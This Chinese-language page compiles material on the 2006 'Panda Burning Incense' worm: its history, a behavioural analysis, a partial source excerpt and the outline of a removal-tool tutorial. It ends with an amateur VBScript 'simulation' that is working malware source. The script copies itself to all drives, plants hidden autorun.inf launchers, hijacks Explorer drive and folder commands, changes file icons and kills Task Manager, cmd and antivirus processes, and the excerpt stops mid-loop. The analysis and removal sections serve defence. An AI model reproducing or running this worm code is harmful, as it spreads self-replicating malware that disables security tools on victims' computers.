VB模拟熊猫烧香

熊猫烧香熊猫烧香是一种经过多次变种的蠕虫病毒变种，2006年10月16日由25岁的中国湖北武汉新洲区人李俊编写，2007年1月初肆虐网络，它主要通过下载的档案传染。

对计算机程序、系统破坏严重。

目录基本信息病毒描述中毒症状病毒危害传播方法1传播对象和运行过程本地磁盘感染1生成autorun.inf1局域网传播杀毒方法1解决办法修改方法1步骤11步骤2病毒源码变种病毒变种病毒描述专家介绍相关报道和评论破案介绍制作者简介童年时喜欢拆装东西没有上大学很遗憾中专开始接触电脑工作后迷上网络曾经找工作遇阻熊猫烧香的第一版作者道歉信展开基本信息病毒名称:熊猫烧香，Worm.WhBoy.（金山称），Worm.Nimaya.熊猫烧香（瑞星称）病毒别名：尼姆亚，武汉男生，后又化身为“金猪报喜”，国外称“熊猫烧香”危险级别：★★★★★病毒类型：蠕虫病毒，能够终止大量的反病毒软件和防火墙软件进程。

影响系统：Win 9x/ME、Win 2000/NT、Win XP、Win 2003 、Win Vista 发现时间：2006年10月16日来源地：中国武汉东湖高新技术开发区关山病毒描述其实是一种蠕虫病毒的变种，而且是经过多次变种而来的，由于中毒电脑的可执行文件会出现“熊猫烧香”图案，所以也被称为“熊猫烧香”病毒。

但原病毒只会对EXE 图标进行替换，并不会对系统本身进行破坏。

而大多数熊猫烧香是中的病毒变种，用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

同时，该病毒的某些变种可以通过局域网进行传播，进而感染局域网内所有计算机系统，最终导致企业局域网瘫痪，无法正常使用，它能感染系统中exe，com，pif，src，html，asp等文件，它还能终止大量的反病毒软件进程并且会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件，使用户的系统备份文件丢失。

被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

病毒大小：22,886 字节加壳方式：UPack样本MD5：9749216a37d57cf4b2e528c027252062样本SHA1：5d3222d8ab6fc11f899eff32c2c8d3cd50cbd755发现时间：2006.11更新时间：2006.11关联病毒：传播方式：通过恶意网页传播，其它木马下载，可通过局域网、移动存储设备等传播技术分析==========又是“熊猫烧香”FuckJacks.exe的变种，和之前的变种一样使用白底熊猫烧香图标，病毒运行后复制自身到系统目录下：%System%\drivers\spoclsv.exe创建启动项：[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "svcshare"="%System%\drivers\spoclsv.exe"修改注册表信息干扰“显示所有文件和文件夹”设置：[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanc ed\Folder\Hidden\SHOW ALL]"CheckedValue"=dword:00000000在各分区根目录生成副本：X:\setup.exeX:\autorun.infautorun.inf内容：[AutoRun]OPEN=setup.exeshellexecute=setup.exeshell\Auto\command=setup.exe尝试关闭下列窗口：QQKavQQA VVirusScanSymantec AntiVirusDubaWindowsesteem procsSystem Safety Monitor Wrapped gift Killer Winsock Expert msctls_statusbar32pjf(ustc)IceSword结束一些对头的进程：Mcshield.exe VsTskMgr.exe naPrdMgr.exe UpdaterUI.exe TBMon.exescan32.exe Ravmond.exe CCenter.exe RavTask.exeRav.exeRavmon.exe RavmonD.exe RavStub.exeKVXP.kxp KvMonXP.kxp KVCenter.kxp KVSrvXP.exe KRegEx.exe UIHost.exeTrojDie.kxp FrogAgent.exeLogo1_.exeLogo_1.exeRundl132.exe禁用一系列服务：Schedule sharedaccess RsCCenter RsRavMon RsCCenter RsRavMonKVWSCKVSrvXPkavsvcA VPMcAfeeFrameworkMcShieldMcTaskManagernavapsvcwscsvcKPfwSvcSNDSrvcccProxyccEvtMgrccSetMgrSPBBCSvcSymantec Core LCNPFMntorMskServiceFireSvc删除若干安全软件启动项信息：RavTaskKvMonXPkavKA VPersonal50McAfeeUpdaterUINetwork Associates Error Reporting ServiceShStatEXEYLive.exeyassistse使用net share命令删除管理共享：net share X$ /del /ynet share admin$ /del /ynet share IPC$ /del /y遍历目录，感染除以下系统目录外其它目录中的exe、com、scr、pif文件：X:\WINDOWSX:\WinntX:\System Volume InformationX:\Recycled%ProgramFiles%\Windows NT%ProgramFiles%\WindowsUpdate%ProgramFiles%\Windows Media Player%ProgramFiles%\Outlook Express%ProgramFiles%\Internet Explorer%ProgramFiles%\NetMeeting%ProgramFiles%\Common Files%ProgramFiles%\ComPlus Applications%ProgramFiles%\Messenger%ProgramFiles%\InstallShield Installation Information%ProgramFiles%\MSN%ProgramFiles%\Microsoft Frontpage%ProgramFiles%\Movie Maker%ProgramFiles%\MSN Gamin Zone将自身捆绑在被感染文件前端，并在尾部添加标记信息：.WhBoy{原文件名}.exe.{原文件大小}.与之前变种不同的是，这个病毒体虽然是22886字节，但是捆绑在文件前段的只有22838字节，被感染文件运行后会出错，而不会像之前变种那样释放出{原文件名}.exe的原始正常文件。

熊猫烧香（源代码）(一) 主程序段分析原“熊猫烧香”病毒“源码”主程序段代码如下所示：{==================主程序开始====================}beginif IsWin9x then //是Win9xRegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程else //WinNTbegin//远程线程映射到Explorer进程//哪位兄台愿意完成之？end;//如果是原始病毒体自己if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 thenInfectFiles //感染和发邮件else //已寄生于宿主程序上了，开始工作beginTmpFile := ParamStr(0); //创建临时文件……....Line nDelete(TmpFile, Length(TmpFile) - 4, 4);TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件，多一个空格ExtractFile(TmpFile); //分离之FillStartupInfo(Si, SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, 0, nil, '.', Si, Pi); //创建新进程运行之……....Line n+7InfectFiles; //感染和发邮件end;end.对于代码：RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程虽然源码提供者省略了相应实现，但这是比较基本的编程实现。

通过把自身注册为服务进程，可以使自己随着系统的启动一起启动。

熊猫烧香病毒之专杀工具的编写教程通过对熊猫烧香的行为分析，这里仅针对所得结果，来进行专杀工具的编写。

本节课我们会学习使用C++来写一个简单的“熊猫烧香”专杀系统。

实验目的：结合本篇文章的知识点，能够彻底掌握文章所讲述的编写杀毒软件的方法。

实验思路：1.理解专杀工具所需要实现的功能2.利用VC++编写专杀工具3.结合Process Monitor验证专杀工具实验步骤：1、病毒行为回顾与归纳这里我们首先回顾一下病毒的行为：**病毒行为1：**病毒本身创建了名为`spoclsv.exe`的进程，该进程文件的路径为：C:WINDOWSsystem32driversspoclsv.exe**病毒行为2：**在命令行模式下使用`net share`命令来取消系统中的共享。

**病毒行为3：**删除安全类软件在注册表中的启动项。

**病毒行为4：**在注册表:HKCUSoftwareMicrosoftWindowsCurrentVersionRun中创建svcshare用于在开机时启动位于`C:WINDOWSsystem32driversspoclsv.exe`的病毒程序。

**病毒行为5：**修改注册表，使得隐藏文件无法通过普通的设置进行显示，该位置为：HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL 病毒将`CheckedValue`的键值设置为了0。

**病毒行为6：**将自身拷贝到根目录，并命名为`setup.exe`，同时创建`autorun.inf`用于病毒的启动，这两个文件的属性都是“隐藏”。

**病毒行为7：**在一些目录中创建名为`Desktop_.ini`的隐藏文件。

**病毒行为8：**向外发包，连接局域网中其他机器。

纵观以上八点行为，这里需要说明的是，其中的第二点行为，由于我不知道用户计算机在中毒前的设置，因此这条我打算忽略。

VB也模拟熊猫烧香！使用过U盘的朋友都知道u盘病毒是一种Autorun自运行病毒,当双击时触发病毒体,会复制自身到C D E和系统盘system32下等盘符,(生成exe文件和一个Autorun.inf文件),同时修改注册表,当点击C盘等盘符右键时,会有一个auto命令(黑色粗体)或者是两个开始命令,本人学习vbs才15天,我也来模拟下这个autorun病毒和部分熊猫烧香功能,本人能力有限, 只能模拟这样的病毒了,声明, 本人模拟这个病毒,全是为了学习和技术，切忌不要搞破坏，如果有人用本人代码破坏,后果自负'使用户不能通过双击打开硬盘，这里还可以修改为使其不能通过双击打开文件夹，同理，不赘续wsh.Regwrite"HKLM\SOFTWARE\Classes\Drive\shell\auto\command\","C:\NYboy.bat '%1'" wsh.Regwrite "HKCR\Drive\shell\","auto"wsh.Regwrite "HKCR\Drive\shell\auto\command\","C:\NYboy.bat '%1'" wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\","auto"wsh.Regwrite "HKCR\Directory\shell\auto\command\","C:\NYboy.bat '%1'" wsh.Regwrite"HKLM\SOFTWARE\Classes\Directory\shell\auto\command\","C:\NYboy.bat '%1'"'修改默认文件图标这里可以换成可爱的熊猫哦wsh.Regwrite "HKCR\exefile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKCR\txtfile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKCR\dllfile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKCR\batfile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKCR\inifile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKLM\SOFTWARE\Classes\exefile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\txtfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\dllfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\batfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\inifile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeC aption","你好啊，开个小小的玩笑"wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeT ext","你已经中毒了!"'复制自身到C,D,E,F,U盘myfile.copy "c:\"myfile.copy "D:\"myfile.copy "E:\"myfile.copy "F:\"myfile.copy "I:\"myfile.attributes=34'定义Autorun.inf 的内容这个就是u盘病毒必须的代码部分这里可以简单写If fso.FileExists("C:\autorun.inf") ThenSet objFolder = fso.GetFile("C:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>C:\autorun.inf"_&"&& echo open=NYboy.bat >>C:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>C:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>C:\autorun.inf"_&"&& echo shell=Auto>>C:\autorun.inf"_&"&& attrib +h +s +r C:\autorun.inf" ,0set autobatc=fso.createtextfile("c:\NYboy.bat",1,ture)autobatc.writeline("NYboy.vbs")End IfIf fso.FileExists("D:\autorun.inf") ThenSet objFolder = fso.GetFile("D:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>D:\autorun.inf"_&"&& echo open=NYboy.bat >>D:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>D:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>D:\autorun.inf"_&"&& echo shell=Auto>>D:\autorun.inf"_&"&& attrib +h +s +r D:\autorun.inf" ,0set autobatd=fso.createtextfile("D:\NYboy.bat",1,ture)autobatd.writeline("NYboy.vbs")End IfIf fso.FileExists("E:\autorun.inf") ThenSet objFolder = fso.GetFile("E:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>E:\autorun.inf"_&"&& echo open=NYboy.bat >>E:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>E:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>E:\autorun.inf"_&"&& echo shell=Auto>>E:\autorun.inf"_&"&& attrib +h +s +r E:\autorun.inf" ,0set autobate=fso.createtextfile("E:\NYboy.bat",1,ture)autobate.writeline("NYboy.vbs")End IfIf fso.FileExists("F:\autorun.inf") ThenSet objFolder = fso.GetFile("F:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>F:\autorun.inf"_&"&& echo open=NYboy.bat >>F:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>F:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>F:\autorun.inf"_&"&& echo shell=Auto>>F:\autorun.inf"_&"&& attrib +h +s +r F:\autorun.inf" ,0set autobatf=fso.createtextfile("F:\NYboy.bat",1,ture)autobatf.writeline("NYboy.vbs")End IfIf fso.FileExists("I:\autorun.inf") ThenSet objFolder = fso.GetFile("I:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>I:\autorun.inf"_&"&& echo open=NYboy.bat >>I:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>I:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>I:\autorun.inf"_&"&& echo shell=Auto>>I:\autorun.inf"_&"&& attrib +h +s +r I:\autorun.inf" ,0set autobatf=fso.createtextfile("I:\NYboy.bat",1,ture)autobatf.writeline("NYboy.vbs")End If'设置病毒体属性为系统只读隐藏wsh.run "cmd /c attrib +h +s +r C:\NYboy.bat"_&"&& attrib +h +s +r D:\NYboy.bat"_&"&& attrib +h +s +r E:\NYboy.bat"_&"&& attrib +h +s +r F:\NYboy.bat"_&"&& attrib +h +s +r I:\NYboy.bat"'强制结束某些进程,比如QQ，记事本，网页，批处理文件，卡巴，realplay等进程,运行后打不开这些文件doset ws=getobject("winmgmts:\\.\root\cimv2")set pp=ws.execquery("select * from win32_process wherename='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name ='winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'")for each i in pp。